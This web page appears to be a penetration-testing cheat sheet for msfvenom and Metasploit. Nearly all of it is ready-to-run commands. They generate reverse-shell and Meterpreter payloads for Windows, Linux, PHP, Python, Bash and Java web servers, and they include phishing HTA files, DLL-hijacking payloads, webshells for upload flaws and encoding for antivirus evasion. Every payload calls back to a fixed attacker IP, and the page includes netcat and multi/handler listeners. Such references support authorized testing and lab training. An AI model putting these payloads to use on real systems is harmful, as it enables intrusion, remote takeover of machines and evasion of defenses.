Skip to main content

Basic Syntax

msfvenom -p <PAYLOAD> LHOST=<IP> LPORT=<PORT> -f <FORMAT> -o <FILE>

Common Options

OptionDescription
-pPayload
LHOSTAttacker IP
LPORTListening port
-fOutput format
-oOutput file
-eEncoder
-iEncode iterations
-bBad chars
--platformForce platform
-aArchitecture

🎯 LISTENER (Metasploit)

msfconsole
use exploit/multi/handler
set payload <PAYLOAD>
set LHOST <IP>
set LPORT <PORT>
run

🪟 Windows Payloads

🖥️ Meterpreter (Recommended)

EXE

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o shell.exe

Staged HTTPS (Bypass AV better)

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.8 LPORT=443 -f exe -o shell.exe

DLL (for DLL hijacking)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f dll -o shell.dll

ASPX (IIS upload)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f aspx -o shell.aspx

HTA (phishing / web)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f hta-psh -o shell.hta

🧾 Normal Shell (cmd)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o shell.exe
Listener: 
nc -lvnp 4444

🧬 Encoded Payload (AV evasion basic)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 \
-e x64/xor -i 10 -f exe -o shell.exe

🐧 Linux Payloads

🧠 Meterpreter ELF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf

🧾 Normal Bash Shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f elf -o shell.elf
Listener: 
nc -lvnp 4444

🐍 Python Payload

msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.8 LPORT=4444 -f raw
Execute: 
python3 -c "<PASTE PAYLOAD>"

🐚 Bash One-liner

msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.8 LPORT=4444 -f raw

🐘 PHP Webshell Reverse

msfvenom -p php/reverse_php LHOST=10.10.14.8 LPORT=4444 -o shell.php
Listener: 
nc -lvnp 4444

🌐 WEB PAYLOADS (Useful in Upload Vulns)

LanguagePayload
JSPjava/jsp_shell_reverse_tcp
WARjava/jsp_shell_reverse_tcp -f war
PHPphp/reverse_php
ASPwindows/meterpreter/reverse_tcp -f asp
ASPXwindows/meterpreter/reverse_tcp -f aspx
Example: 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war -o shell.war